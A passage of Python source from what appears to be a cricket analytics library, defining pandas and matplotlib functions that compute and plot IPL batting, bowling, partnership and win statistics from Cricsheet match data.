    This function computes the performance of batsmen against the bowlers of an opposition in all matches
    Usage
    teamBatsmenVsBowlersOppnAllMatches(matches,main,opposition,plot=True,top=5,runsScored=20)
    Arguments
    matches
    All the matches of the team against one specific opposition
    main
    The team for which the batting performance is sought
    opposition
    The opposition team
    plot
    If plot=True then a plot will be displayed else a data frame will be returned
    top
    The number of players to be plotted or returned as a dataframe. The default is 5
    runsScored
    The cutoff for runs scored against a bowler
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None or dataframe
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
teamBatsmenVsBowlersOppnAllMatchesPlot
teamBatsmenPartnershipOppnAllMatchesChart
teamBatsmenVsBowlersOppnAllMatches
'''
df1 = matches[matches.team == main]
df2 = df1[['batsman','bowler','runs']]
# Runs scored by bowler
df3=df2.groupby(['batsman','bowler']).sum().reset_index(inplace=False)
df3.columns = ['batsman','bowler','runsScored']
# Need to pick the 'top' number of bowlers
df4 = df3.groupby('batsman').sum().reset_index(inplace=False).sort_values('runsScored',ascending=False)
df4.columns = ['batsman','totalRunsScored']
df5 = df4.head(top)
df6= pd.merge(df5,df3,on='batsman')
df7 = df6[['batsman','bowler','runsScored']]
    # Keep only rows above the runsScored cutoff, else there are too many rows
df8 = df7[df7['runsScored'] >runsScored]
df9=df8.groupby(['batsman','bowler'])['runsScored'].sum().unstack().fillna(0)
# Note: Can also use the below code -*************
#df8=df7.pivot(columns='bowler',index='batsman').fillna(0)
if plot == True:
ax=df9.plot(kind='bar',stacked=False,legend=False,fontsize=8)
plt.legend(loc='center left', bbox_to_anchor=(1.0, 0.5),fontsize=8)
plt.title('Runs against bowlers ' + main + '-' + opposition)
plt.xlabel('Batsman')
plt.ylabel('Runs scored')
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
else:
return(df7)
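# A hedged usage sketch, assuming kkr_csk as above:
#   teamBatsmenVsBowlersOppnAllMatches(kkr_csk, "Kolkata Knight Riders",
#       "Chennai Super Kings", plot=True, top=5, runsScored=20)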
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 26 Jan 2019
# Function: teamBattingScorecardOppnAllMatches
# This function computes the batting scorecard for all matches
#
###########################################################################################
def teamBattingScorecardOppnAllMatches(matches,main,opposition):
'''
Team batting scorecard of a team in all matches against an opposition
Description
    This function computes and returns the batting scorecard (runs, fours, sixes, balls played)
    for the team in all matches against an opposition
    Usage
    teamBattingScorecardOppnAllMatches(matches,main,opposition)
    Arguments
    matches
    the data frame of all matches between a team and an opposition obtained with the call getAllMatchesBetweenTeams()
    main
    The main team for which the scorecard is required
opposition
The opposition team
Value
scorecard The scorecard of all the matches
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
teamBatsmenPartnershipAllOppnAllMatches
teamBowlingWicketKindOppositionAllMatches
'''
team=matches.loc[matches.team== main]
a1= getRuns(team)
b1= getFours(team)
c1= getSixes(team)
# Merge columns
d1=pd.merge(a1, b1, how='outer', on='batsman')
e=pd.merge(d1,c1,how='outer', on='batsman')
e=e.fillna(0)
e['4s']=e['4s'].astype(int)
e['6s']=e['6s'].astype(int)
e['SR']=(e['runs']/e['balls']) *100
scorecard = e[['batsman','runs','balls','4s','6s','SR']].sort_values('runs',ascending=False)
return(scorecard)
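# A hedged usage sketch, assuming kkr_csk as above:
#   sc = teamBattingScorecardOppnAllMatches(kkr_csk, "Kolkata Knight Riders",
#                                           "Chennai Super Kings")
#   print(sc.head())   # batsman, runs, balls, 4s, 6s, SR sorted by runs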
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 26 Jan 2019
# Function: teamBowlingScorecardOppnAllMatches
# This function computes the bowling scorecard for all matches
#
###########################################################################################
def teamBowlingScorecardOppnAllMatches(matches,main,opposition):
'''
Team bowling scorecard opposition all matches
Description
    This function computes and returns the bowling dataframe of the best bowlers
    (overs, runs conceded, maidens, wickets) against an IPL opposition in all matches
    Usage
    teamBowlingScorecardOppnAllMatches(matches,main,opposition)
    Arguments
    matches
    The matches of the team against the opposition
    main
    Team for which bowling performance is required
    opposition
    The opposing IPL team
    Value
    A data frame with the bowling performance in all matches against the opposition
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
teamBowlingWicketKindOppositionAllMatches
teamBatsmenVsBowlersOppnAllMatches
plotWinsbyTossDecision
'''
team=matches.loc[matches.team== main]
# Compute overs bowled
a1= getOvers(team).reset_index(inplace=False)
# Compute runs conceded
b1= getRunsConceded(team).reset_index(inplace=False)
# Compute maidens
c1= getMaidens(team).reset_index(inplace=False)
# Compute wickets
d1= getWickets(team).reset_index(inplace=False)
e1=pd.merge(a1, b1, how='outer', on='bowler')
f1= pd.merge(e1,c1,how='outer', on='bowler')
g1= pd.merge(f1,d1,how='outer', on='bowler')
g1 = g1.fillna(0)
# Compute economy rate
g1['econrate'] = g1['runs']/g1['overs']
g1.columns=['bowler','overs','runs','maidens','wicket','econrate']
g1.maidens = g1.maidens.astype(int)
g1.wicket = g1.wicket.astype(int)
g2 = g1.sort_values('wicket',ascending=False)
return(g2)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 26 Jan 2019
# Function: teamBowlingWicketKindOppositionAllMatches
# This function plots the performance of bowlers and the kind of wickets
#
###########################################################################################
def teamBowlingWicketKindOppositionAllMatches(matches,main,opposition,plot=True,top=5,wickets=2,savePic=False, dir1=".",picFile="pic1.png"):
'''
Team bowlers wicket kind against an opposition in all matches
Description
This function computes performance of bowlers of a team and the wicket kind against
an opposition in all matches against the opposition
Usage
    teamBowlingWicketKindOppositionAllMatches(matches,main,opposition,plot=True,top=5,wickets=2)
    Arguments
    matches
    The data frame of all matches between a team and the opposition
main
The team for which the performance is required
opposition
The opposing team
plot
If plot=True then a plot is displayed else a dataframe is returned
top
The top number of players to be considered
wickets
The minimum number of wickets as cutoff
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None or dataframe The return depends on the value of the plot
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
plotWinsByRunOrWickets
teamBowlersVsBatsmenOppnAllMatches
'''
df1=matches.loc[matches.team== main]
df2= df1[['bowler','kind','player_out']]
# Find all rows where there was a wicket
df2=df2[df2.player_out != '0']
# Number of wickets taken by bowler
df3=df2.groupby(['bowler','kind']).count().reset_index(inplace=False)
df3.columns = ['bowler','kind','wickets']
# Need to pick the 'top' number of bowlers by wickets
df4 = df3.groupby('bowler').sum().reset_index(inplace=False).sort_values('wickets',ascending=False)
df4.columns = ['bowler','totalWickets']
df5 = df4.head(top)
df6= pd.merge(df5,df3,on='bowler')
df7 = df6[['bowler','kind','wickets']]
    # Keep only bowlers above the wickets cutoff, else there are too many rows
df8 = df7[df7['wickets'] >wickets]
df9=df8.groupby(['bowler','kind'])['wickets'].sum().unstack().fillna(0)
# Note: Can also use the below code -*************
#df9=df8.pivot(columns='bowler',index='batsman').fillna(0)
if plot == True:
ax=df9.plot(kind='bar',stacked=False,legend=False,fontsize=8)
plt.legend(loc='center left', bbox_to_anchor=(1.0, 0.5),fontsize=8)
        plt.title('Wicket kind by bowlers of ' + main + '-' + opposition)
plt.xlabel('Bowler')
plt.ylabel('Total wickets')
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
else:
return(df7)
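# A hedged usage sketch, assuming kkr_csk as above:
#   teamBowlingWicketKindOppositionAllMatches(kkr_csk, "Kolkata Knight Riders",
#       "Chennai Super Kings", plot=True, top=5, wickets=2)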
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 26 Jan 2019
# Function: teamBowlersVsBatsmenOppnAllMatches
# This function plots the performance of the bowlers against batsmen
#
###########################################################################################
def teamBowlersVsBatsmenOppnAllMatches(matches,main,opposition,plot=True,top=5,runsConceded=10, savePic=False, dir1=".",picFile="pic1.png"):
'''
Team bowlers vs batsmen against an opposition in all matches
Description
This function computes performance of bowlers of a team against an opposition in all
matches against the opposition
Usage
    teamBowlersVsBatsmenOppnAllMatches(matches,main,opposition,plot=True,top=5,runsConceded=10)
    Arguments
    matches
    The data frame of all matches between a team and the opposition.
    main
    The main team against which the performance is required
    opposition
    The opposition team against which the performance is required
    plot
    If true plot else return dataframe
    top
    The number of rows to be returned. 5 by default
    runsConceded
    The minimum number of runs to use as cutoff
    savePic
    If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
dataframe The dataframe with all performances
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
teamBatsmenPartnershipOppnAllMatches
teamBowlersVsBatsmenOppnAllMatchesRept
'''
df1=matches.loc[matches.team== main]
df2= df1[['bowler','batsman','runs']]
# Number of wickets taken by bowler
df3=df2.groupby(['bowler','batsman']).sum().reset_index(inplace=False)
df3.columns = ['bowler','batsman','runsConceded']
# Need to pick the 'top' number of bowlers by wickets
df4 = df3.groupby('bowler').sum().reset_index(inplace=False).sort_values('runsConceded',ascending=False)
df4.columns = ['bowler','totalRunsConceded']
df5 = df4.head(top)
df6= pd.merge(df5,df3,on='bowler')
df7 = df6[['bowler','batsman','runsConceded']]
    # Keep only rows above the runsConceded cutoff, else there are too many rows
df8 = df7[df7['runsConceded'] >runsConceded]
df9=df8.groupby(['bowler','batsman'])['runsConceded'].sum().unstack().fillna(0)
# Note: Can also use the below code -*************
#df9=df8.pivot(columns='bowler',index='batsman').fillna(0)
if plot == True:
ax=df9.plot(kind='bar',stacked=False,legend=False,fontsize=8)
plt.legend(loc='center left', bbox_to_anchor=(1.0, 0.5),fontsize=8)
        plt.title('Runs conceded by bowlers of ' + main + '-' + opposition)
plt.xlabel('Bowler')
plt.ylabel('Total runs')
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
else:
return(df7)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 26 Jan 2019
# Function: plotWinLossBetweenTeams
# This function plots the number of wins and losses in teams
#
###########################################################################################
def plotWinLossBetweenTeams(matches,team1,team2,plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
Plot wins for each team
Description
    This function computes and plots the number of wins for each team in all their encounters.
    The plot includes the number of wins by each team and the matches with no result
    Usage
    plotWinLossBetweenTeams(matches,team1,team2)
Arguments
matches
The dataframe with all matches between 2 IPL teams
team1
The 1st team
team2
The 2nd team
plot
    If plot=True then the plot is displayed (or saved if savePic=True)
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
https://github.com/tvganesh/yorkrData
See Also
teamBattingScorecardOppnAllMatches
teamBatsmenPartnershipOppnAllMatchesChart
getAllMatchesBetweenTeams
'''
a=matches[['date','winner']].groupby(['date','winner']).count().reset_index(inplace=False)
b=a.groupby('winner').count().reset_index(inplace=False)
b.columns = ['winner','number']
sns.barplot(x='winner',y='number',data=b)
plt.xlabel('Winner')
plt.ylabel('Number')
plt.title("Wins vs losses " + team1 + "-"+ team2)
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
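# A hedged usage sketch, assuming kkr_csk as above:
#   plotWinLossBetweenTeams(kkr_csk, "Kolkata Knight Riders",
#                           "Chennai Super Kings")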
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 26 Jan 2019
# Function: plotWinsByRunOrWickets
# This function plots how the win for the team was whether by runs or wickets
#
###########################################################################################
def plotWinsByRunOrWickets(matches,team1,plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
    Plot whether the wins for the team were by runs or wickets
    Description
    This function computes and plots the number of wins by runs vs the number of wins
    by wickets
Usage
plotWinsByRunOrWickets(matches,team1)
Arguments
matches
The dataframe with all matches between 2 IPL teams
team1
The team for which the plot has to be done
plot
    If plot=True then the plot is displayed (or saved if savePic=True)
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
teamBowlingScorecardOppnAllMatches
teamBatsmenPartnershipOppnAllMatchesChart
getAllMatchesBetweenTeams
'''
# Get the number of matches won
df= matches.loc[matches.winner == team1]
a=df[['date','winType']].groupby(['date','winType']).count().reset_index(inplace=False)
b=a.groupby('winType').count().reset_index(inplace=False)
b.columns = ['winType','number']
sns.barplot(x='winType',y='number',data=b)
plt.xlabel('Win Type - Runs or wickets')
plt.ylabel('Number')
plt.title("Win type for team -" + team1 )
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
            plt.show()
plt.gcf().clear()
return
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 26 Jan 2019
# Function: plotWinsbyTossDecision
# This function plots the number of wins/losses for team based on its toss decision
#
###########################################################################################
def plotWinsbyTossDecision(matches,team1,tossDecision='bat', plot=True, savePic=False, dir1=".",picFile="pic1.png"):
'''
    Plot the wins and losses for a team based on its toss decision
    Description
    This function computes and plots the number of wins and losses for a team
    when the team won the toss and made the given toss decision
Usage
plotWinsbyTossDecision(matches,team1,tossDecision='bat')
Arguments
matches
The dataframe with all matches between 2 IPL teams
    team1
    The team for which the plot has to be done
    tossDecision
    The toss decision, e.g. 'bat'
    plot
    If plot=True then the plot is displayed (or saved if savePic=True)
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
teamBowlingScorecardOppnAllMatches
teamBatsmenPartnershipOppnAllMatchesChart
teamBowlingWicketKindOppositionAllMatches
'''
df=matches.loc[(matches.tossDecision==tossDecision) & (matches.tossWinner==team1)]
a=df[['date','winner']].groupby(['date','winner']).count().reset_index(inplace=False)
b=a.groupby('winner').count().reset_index(inplace=False)
b.columns = ['winner','number']
sns.barplot(x='winner',y='number',data=b)
plt.xlabel('Winner ' + 'when toss decision was to :' + tossDecision)
plt.ylabel('Number')
plt.title('Wins vs losses for ' + team1 + ' when toss decision was to ' + tossDecision )
if(plot==True):
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
return
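# A hedged usage sketch, assuming kkr_csk as above:
#   plotWinsbyTossDecision(kkr_csk, "Kolkata Knight Riders", tossDecision='bat')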
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 1 Feb 2019
# Function: getAllMatchesAllOpposition
# This function gets all the matches between a IPL team and all opposition
#
###########################################################################################
def getAllMatchesAllOpposition(team1,dir=".",save=False,odir="."):
'''
Get data on all matches against all opposition
Description
    This function gets all the matches for a particular IPL team against all other
    oppositions. It constructs a large dataframe of all these matches. This can be
    saved by the user and used in functions in which analyses are done for all
    matches and for all oppositions.
    Usage
    getAllMatchesAllOpposition(team,dir=".",save=False)
    Arguments
    team
    The team for which all matches against all oppositions have to be obtained e.g. Mumbai Indians
    dir
    The directory in which the saved CSV files of matches exist
    save
    Default=False. This parameter indicates whether the combined data frame needs to be saved or not. It is recommended to save this large dataframe as the creation of this data frame takes several seconds depending on the number of matches
Value
match The combined data frame
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
saveAllMatchesAllOppositionIPLT20
teamBatsmenPartnershiAllOppnAllMatches
'''
    # Create the wildcard pattern for the team
t1 = '*' + team1 +'*.csv'
path= os.path.join(dir,t1)
files = glob.glob(path)
print(len(files))
    # Proceed only if there are matches for the team
if len(files) !=0:
df = pd.DataFrame()
for file in files:
df1 = pd.read_csv(file)
df=pd.concat([df,df1])
if save==True:
dest= team1 + '-allMatchesAllOpposition.csv'
output=os.path.join(odir,dest)
df.to_csv(output)
else:
return(df)
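# A hedged usage sketch for getAllMatchesAllOpposition (the path is hypothetical):
#   kkr_all = getAllMatchesAllOpposition("Kolkata Knight Riders",
#                                        dir="../data", save=False)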
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 1 Feb 2019
# Function: saveAllMatchesAllOppositionIPLT20
# This function saves all the matches between all IPL team and all opposition
#
###########################################################################################
def saveAllMatchesAllOppositionIPLT20(dir1,odir="."):
'''
Saves matches against all IPL teams as dataframe and CSV for an IPL team
Description
    This function saves all matches of each IPL team against all oppositions as a
    single dataframe per team in the specified output directory
    Usage
    saveAllMatchesAllOppositionIPLT20(dir1,odir=".")
    Arguments
    dir1
    Directory which has the CSV files of individual matches
    odir
    Directory in which the combined match data frames are saved
Value
None
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
convertYaml2PandasDataframeT20
teamBattingScorecardMatch
'''
teams = ["Chennai Super Kings","Deccan Chargers","Delhi Daredevils",
"Kings XI Punjab", 'Kochi Tuskers Kerala',"Kolkata Knight Riders",
"Mumbai Indians", "Pune Warriors","Rajasthan Royals",
"Royal Challengers Bangalore","Sunrisers Hyderabad","Gujarat Lions",
"Rising Pune Supergiants"]
for team in teams:
print("Team=",team)
getAllMatchesAllOpposition(team,dir=dir1,save=True,odir=odir)
time.sleep(2) #Sleep before next save
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 1 Feb 2019
# Function: teamBatsmenPartnershiAllOppnAllMatches
# This function computes the partnerships of an IPL team against all other IPL teams
#
###########################################################################################
def teamBatsmenPartnershiAllOppnAllMatches(matches,theTeam,report="summary",top=5):
'''
    Team batting partnership against all oppositions in all IPL matches
    Description
    This function computes the performance of batsmen against all bowlers of all oppositions in
    all matches. This function returns a dataframe
Usage
teamBatsmenPartnershiAllOppnAllMatches(matches,theTeam,report="summary")
Arguments
matches
All the matches of the team against the oppositions
theTeam
    The team for which the batting partnerships are sought
report
If the report="summary" then the list of top batsmen with the highest partnerships
is displayed. If report="detailed" then the detailed break up of partnership is returned
as a dataframe
top
The number of players to be displayed from the top
Value
partnerships The data frame of the partnerships
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
See Also
teamBatsmenVsBowlersOppnAllMatchesPlot
teamBatsmenPartnershipOppnAllMatchesChart
'''
df1 = matches[matches.team == theTeam]
df2 = df1[['batsman','non_striker','runs']]
# Compute partnerships
df3=df2.groupby(['batsman','non_striker']).sum().reset_index(inplace=False)
df3.columns = ['batsman','non_striker','partnershipRuns']
# Compute total partnerships
df4 = df3.groupby('batsman').sum().reset_index(inplace=False).sort_values('partnershipRuns',ascending=False)
df4.columns = ['batsman','totalPartnershipRuns']
# Select top 5
df5 = df4.head(top)
df6= pd.merge(df5,df3,on='batsman')
if report == 'summary':
return(df5)
elif report == 'detailed':
return(df6)
else:
print("Invalid option")
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 1 Feb 2019
# Function: teamBatsmenPartnershipAllOppnAllMatchesChart
# This function computes and plots the partnerships of an IPL team against all other IPL teams
#
###########################################################################################
def teamBatsmenPartnershipAllOppnAllMatchesChart(matches,main,plot=True,top=5,partnershipRuns=20, savePic=False, dir1=".",picFile="pic1.png"):
'''
Plots team batting partnership all matches all oppositions
Description
    This function plots the batting partnerships of a team against all oppositions in all matches. This function also returns a dataframe with the batting partnerships
Usage
    teamBatsmenPartnershipAllOppnAllMatchesChart(matches,main,plot=True,top=5,partnershipRuns=20)
    Arguments
    matches
    All the matches of the team against all oppositions
    main
    The main team for which the batting partnerships are sought
plot
    Whether the partnerships have to be rendered as a plot. If plot=False the data frame is returned
top
The number of players from the top to be included in chart
partnershipRuns
The minimum number of partnership runs to include for the chart
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None or partnerships
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
'''
df1 = matches[matches.team == main]
df2 = df1[['batsman','non_striker','runs']]
# Compute partnerships
df3=df2.groupby(['batsman','non_striker']).sum().reset_index(inplace=False)
df3.columns = ['batsman','non_striker','partnershipRuns']
# Compute total partnerships
df4 = df3.groupby('batsman').sum().reset_index(inplace=False).sort_values('partnershipRuns',ascending=False)
df4.columns = ['batsman','totalPartnershipRuns']
# Select top 5
df5 = df4.head(top)
df6= pd.merge(df5,df3,on='batsman')
df7 = df6[['batsman','non_striker','partnershipRuns']]
    # Keep only partnerships above the partnershipRuns cutoff, else there are too many rows
df8 = df7[df7['partnershipRuns'] > partnershipRuns]
df9=df8.groupby(['batsman','non_striker'])['partnershipRuns'].sum().unstack(fill_value=0)
# Note: Can also use the below code -*************
#df8=df7.pivot(columns='non_striker',index='batsman').fillna(0)
if plot == True:
df9.plot(kind='bar',stacked=True,legend=False,fontsize=8)
plt.legend(loc='center left', bbox_to_anchor=(1.0, 0.5),fontsize=8)
        plt.title('Batting partnerships of ' + main + ' against all teams')
plt.xlabel('Batsman')
plt.ylabel('Partnership runs')
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
else:
return(df7)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 1 Feb 2019
# Function: teamBatsmenVsBowlersAllOppnAllMatches
# This function computes and plots the performance of batsmen
# of an IPL team against all other teams
#
###########################################################################################
def teamBatsmenVsBowlersAllOppnAllMatches(matches,main,plot=True,top=5,runsScored=20, savePic=False, dir1=".",picFile="pic1.png"):
'''
Report of team batsmen vs bowlers in all matches all oppositions
Description
This function computes the performance of batsmen against all bowlers of all oppositions in all matches
Usage
teamBatsmenVsBowlersAllOppnAllMatches(matches,main,plot=True,top=5,runsScored=20)
Arguments
matches
All the matches of the team against all oppositions
    main
    The team for which the batting performance is sought
    plot
    Whether a plot is required or not
    top
    The number of top batsmen to be included
    runsScored
    The cutoff for total runs scored by a batsman
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
The data frame of the batsman and the runs against bowlers
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
'''
df1 = matches[matches.team == main]
df2 = df1[['batsman','bowler','runs']]
# Runs scored by bowler
df3=df2.groupby(['batsman','bowler']).sum().reset_index(inplace=False)
df3.columns = ['batsman','bowler','runsScored']
# Need to pick the 'top' number of bowlers
df4 = df3.groupby('batsman').sum().reset_index(inplace=False).sort_values('runsScored',ascending=False)
df4.columns = ['batsman','totalRunsScored']
df5 = df4.head(top)
df6= pd.merge(df5,df3,on='batsman')
df7 = df6[['batsman','bowler','runsScored']]
    # Keep only rows above the runsScored cutoff, else there are too many rows
df8 = df7[df7['runsScored'] >runsScored]
df9=df8.groupby(['batsman','bowler'])['runsScored'].sum().unstack().fillna(0)
# Note: Can also use the below code -*************
#df8=df7.pivot(columns='bowler',index='batsman').fillna(0)
if plot == True:
ax=df9.plot(kind='bar',stacked=False,legend=False,fontsize=8)
plt.legend(loc='center left', bbox_to_anchor=(1.0, 0.5),fontsize=8)
#ax.legend(fontsize=25)
plt.title('Runs by ' + main + ' against all T20 bowlers')
plt.xlabel('Batsman')
plt.ylabel('Runs scored')
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
else:
return(df7)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 1 Feb 2019
# Function: teamBattingScorecardAllOppnAllMatches
# This function computes and batting scorecard of an IPL team against all other
# IPL teams
#
###########################################################################################
def teamBattingScorecardAllOppnAllMatches(matches,main):
'''
Team batting scorecard against all oppositions in all matches
Description
    This function computes and returns the batting scorecard of a team in all matches against all oppositions. The data frame has the balls played, 4s, 6s and runs scored by each batsman
    Usage
    teamBattingScorecardAllOppnAllMatches(matches,main)
    Arguments
    matches
    All matches of the team in all matches with all oppositions
    main
    The team for which the batting scorecard is sought
Value
details The data frame of the scorecard of the team in all matches against all oppositions
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
'''
team=matches.loc[matches.team== main]
a1= getRuns(team)
b1= getFours(team)
c1= getSixes(team)
# Merge columns
d1=pd.merge(a1, b1, how='outer', on='batsman')
e=pd.merge(d1,c1,how='outer', on='batsman')
e=e.fillna(0)
e['4s']=e['4s'].astype(int)
e['6s']=e['6s'].astype(int)
e['SR']=(e['runs']/e['balls']) *100
scorecard = e[['batsman','runs','balls','4s','6s','SR']].sort_values('runs',ascending=False)
return(scorecard)
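# A hedged usage sketch, assuming kkr_all was built with getAllMatchesAllOpposition
# as shown above:
#   teamBattingScorecardAllOppnAllMatches(kkr_all, "Kolkata Knight Riders")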
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 1 Feb 2019
# Function: teamBowlingScorecardAllOppnAllMatches
# This function computes and bowling scorecard of an IPL team against all other
# IPL teams
#
###########################################################################################
def teamBowlingScorecardAllOppnAllMatches(matches,main):
'''
Team bowling scorecard all opposition all matches
Description
    This function computes and returns the bowling dataframe of bowlers' deliveries,
    maidens, overs, wickets against all oppositions in all matches
    Usage
    teamBowlingScorecardAllOppnAllMatches(matches,main)
    Arguments
    matches
    The matches of the team against all oppositions and all matches
    main
    Team for which bowling performance is required
    Value
    A data frame with the bowling performance in all matches against all oppositions
Note
Maintainer: Tinniam V Ganesh tvganesh.85@gmail.com
Author(s)
Tinniam V Ganesh
References
http://cricsheet.org/
https://gigadom.wordpress.com/
'''
team=matches.loc[matches.team== main]
# Compute overs bowled
a1= getOvers(team).reset_index(inplace=False)
# Compute runs conceded
b1= getRunsConceded(team).reset_index(inplace=False)
# Compute maidens
c1= getMaidens(team).reset_index(inplace=False)
# Compute wickets
d1= getWickets(team).reset_index(inplace=False)
e1=pd.merge(a1, b1, how='outer', on='bowler')
f1= pd.merge(e1,c1,how='outer', on='bowler')
g1= pd.merge(f1,d1,how='outer', on='bowler')
g1 = g1.fillna(0)
# Compute economy rate
g1['econrate'] = g1['runs']/g1['overs']
g1.columns=['bowler','overs','runs','maidens','wicket','econrate']
g1.maidens = g1.maidens.astype(int)
g1.wicket = g1.wicket.astype(int)
g2 = g1.sort_values('wicket',ascending=False)
return(g2)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 1 Feb 2019
# Function: teamBowlingWicketKindAllOppnAllMatches
# This function computes and plots the wicket kind of an IPL team against all other
# IPL teams
#
###########################################################################################
def teamBowlingWicketKindAllOppnAllMatches(matches,main,plot=True,top=5,wickets=2,savePic=False, dir1=".",picFile="pic1.png"):
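'''
Team bowling wicket kind against all oppositions in all matches
Description
This function computes the wickets taken by the top bowlers of the team against all
oppositions, broken up by the kind of dismissal, and either plots them or returns the dataframe
Usage
teamBowlingWicketKindAllOppnAllMatches(matches,main,plot=True,top=5,wickets=2)
Arguments
matches
All the matches of the team against all oppositions
main
The team for which the wicket kinds are sought
plot
If plot=TRUE then a plot is created otherwise a data frame is returned
top
The top number of bowlers by total wickets
wickets
The minimum number of wickets for a row to be included
savePic
If savePic = True then the plot is saved
dir1
The directory where the plot is saved
picFile
The name of the savefile
Value
None or the data frame of bowler, kind and wickets
'''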
df1=matches.loc[matches.team== main]
df2= df1[['bowler','kind','player_out']]
# Find all rows where there was a wicket
df2=df2[df2.player_out != '0']
# Number of wickets taken by bowler
df3=df2.groupby(['bowler','kind']).count().reset_index(inplace=False)
df3.columns = ['bowler','kind','wickets']
# Need to pick the 'top' number of bowlers by wickets
df4 = df3.groupby('bowler').sum().reset_index(inplace=False).sort_values('wickets',ascending=False)
df4.columns = ['bowler','totalWickets']
df5 = df4.head(top)
df6= pd.merge(df5,df3,on='bowler')
df7 = df6[['bowler','kind','wickets']]
# Keep only rows with more than 'wickets' wickets, to reduce clutter
df8 = df7[df7['wickets'] >wickets]
df9=df8.groupby(['bowler','kind'])['wickets'].sum().unstack().fillna(0)
# Note: Can also use the below code -*************
#df9=df8.pivot(index='bowler',columns='kind',values='wickets').fillna(0)
if plot == True:
ax=df9.plot(kind='bar',stacked=False,legend=False,fontsize=8)
plt.legend(loc='center left', bbox_to_anchor=(1.0, 0.5),fontsize=8)
plt.title('Wicket kind by bowlers of ' + main + ' against all T20 teams')
plt.xlabel('Bowler')
plt.ylabel('Total wickets')
if(savePic):
plt.savefig(os.path.join(dir1,picFile),bbox_inches='tight')
else:
plt.show()
plt.gcf().clear()
else:
return(df7)
##########################################################################################
# Designed and developed by Tinniam V Ganesh
# Date : 1 Feb 2019
# Function: teamBowlersVsBatsmenAllOppnAllMatches
# This function computes and plots the performance of bowlers of an IPL team against all other
# IPL teams
#
###########################################################################################
